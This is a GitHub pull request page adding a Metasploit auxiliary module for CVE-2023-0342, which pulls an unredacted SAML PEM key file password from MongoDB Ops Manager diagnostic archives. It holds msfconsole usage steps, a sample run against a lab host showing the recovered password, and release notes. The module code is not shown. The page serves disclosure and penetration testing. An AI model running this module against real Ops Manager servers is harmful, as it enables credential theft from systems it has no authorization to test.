Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

mongodb ops manager diagnostic archive info disclosure (cve-2023-0342) #18936

Merged
merged 4 commits into from
Apr 12, 2024
Merged

mongodb ops manager diagnostic archive info disclosure (cve-2023-0342) #18936

merged 4 commits into from
Apr 12, 2024

Conversation

h00die
Copy link
Contributor

@h00die h00die commented Mar 7, 2024
edited
Loading

MongoDB Ops Manager Diagnostics Archive does not redact SAML SSL Pem Key File Password
field (mms.saml.ssl.PEMKeyFilePassword) within app settings. Archives do not include
the PEM files themselves. This module extracts that unredacted password and stores
the diagnostic archive for additional manual review.

This issue affects MongoDB Ops Manager v5.0 prior to 5.0.21 and
MongoDB Ops Manager v6.0 prior to 6.0.12.

API credentials with the role of GLOBAL_MONITORING_ADMIN or GLOBAL_OWNER are required.

Successfully tested against MongoDB Ops Manager v6.0.11.

While the vuln disclosure doesn't mention the exact field, I tested all the PEM password fields, this was the only one which was not redacted. Also installed 6.0.12 and confirmed it redacted mms.saml.ssl.PEMKeyFilePassword, so its definitely the one in question.

I was also unable to find any public PoCs for this, so this may be the first!

Verification

  • Install the application
  • Start msfconsole
  • Do: use auxiliary/gather/mongodb_ops_manager_diagnostic_archive_info
  • Do: set API_USERNAME [api_username]
  • Do: set API_PASSWORD [api_password]
  • Do: run
  • You should find similar output to the following: Found ubuntu22-0-bgrid's unredacted mms.saml.ssl.PEMKeyFilePassword: FINDME

@cdelafuente-r7 cdelafuente-r7 self-assigned this Apr 2, 2024
cdelafuente-r7
cdelafuente-r7 reviewed Apr 3, 2024
View reviewed changes
Copy link
Contributor

@cdelafuente-r7 cdelafuente-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Thanks @h00die for this module. I just left a few minor comments before it lands. I tested against v6.0.11 on Ubuntu 22.04.2.

modules/auxiliary/gather/mongodb_ops_manager_diagnostic_archive_info.rb Outdated Show resolved Hide resolved
modules/auxiliary/gather/mongodb_ops_manager_diagnostic_archive_info.rb Outdated Show resolved Hide resolved
modules/auxiliary/gather/mongodb_ops_manager_diagnostic_archive_info.rb Outdated Show resolved Hide resolved
modules/auxiliary/gather/mongodb_ops_manager_diagnostic_archive_info.rb Show resolved Hide resolved
modules/auxiliary/gather/mongodb_ops_manager_diagnostic_archive_info.rb Outdated Show resolved Hide resolved
@cdelafuente-r7
Copy link
Contributor

Thanks for updating this @h00die ! Everything looks good to me now. I tested against v6.0.11 on Ubuntu 22.04.2 and verified the SAML SSL Pem Key File Password had been retrieved. I'll go ahead and land it.

  • Example output:
msf6 auxiliary(gather/mongodb_ops_manager_diagnostic_archive_info) > run verbose=true rhosts=192.168.101.229 api_pubkey=geujahpa api_privkey=916d10c8-a816-4d7b-b51f-89239addeb0c
[*] Running module against 192.168.101.229

[*] Checking for orgs
[*] Looking for projects in org 6619096946dff15cd9cb9944
[+]   Found project: MSF Test Project (661909f846dff15cd9cb9a0d)
[+] Stored Project Diagnostics files to /home/msfuser/.msf4/loot/20240412151828_default_192.168.101.229_mongodb.ops_mana_661455.gz
[*]     Opening project_diagnostics.tar.gz
[+] Found ubuntu22-0-bgrid's unredacted mms.saml.ssl.PEMKeyFilePassword: FINDME
[+] Found ubuntu22-0-mms's unredacted mms.saml.ssl.PEMKeyFilePassword: FINDME
[+]   Found project: Project 0 (6619096946dff15cd9cb9948)
[+] Stored Project Diagnostics files to /home/msfuser/.msf4/loot/20240412151829_default_192.168.101.229_mongodb.ops_mana_303992.gz
[*]     Opening project_diagnostics.tar.gz
[+] Found ubuntu22-0-bgrid's unredacted mms.saml.ssl.PEMKeyFilePassword: FINDME
[+] Found ubuntu22-0-mms's unredacted mms.saml.ssl.PEMKeyFilePassword: FINDME
[*] Auxiliary module execution completed

@cdelafuente-r7 cdelafuente-r7 merged commit d36e22f into rapid7:master Apr 12, 2024
34 checks passed
@cdelafuente-r7 cdelafuente-r7 added the rn-modules release notes for new or majorly enhanced modules label Apr 12, 2024
@cdelafuente-r7
Copy link
Contributor

Release Notes

This adds an auxiliary module that leverages an information disclosure vulnerability (CVE-2023-0342) in MongoDB Ops Manager v5.0 prior to 5.0.21 and v6.0 prior to 6.0.12 to retrieve the SAML SSL Pem Key File Password, which is stored in plaintext in the application's Diagnostics Archive.

@h00die h00die deleted the mongo_ops branch April 12, 2024 20:41
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers

@bwatters-r7 bwatters-r7 bwatters-r7 left review comments

@cdelafuente-r7 cdelafuente-r7 cdelafuente-r7 approved these changes

Assignees

@cdelafuente-r7 cdelafuente-r7

Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Metasploit Kanban
Archived in project
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.
3 participants
@h00die @cdelafuente-r7 @bwatters-r7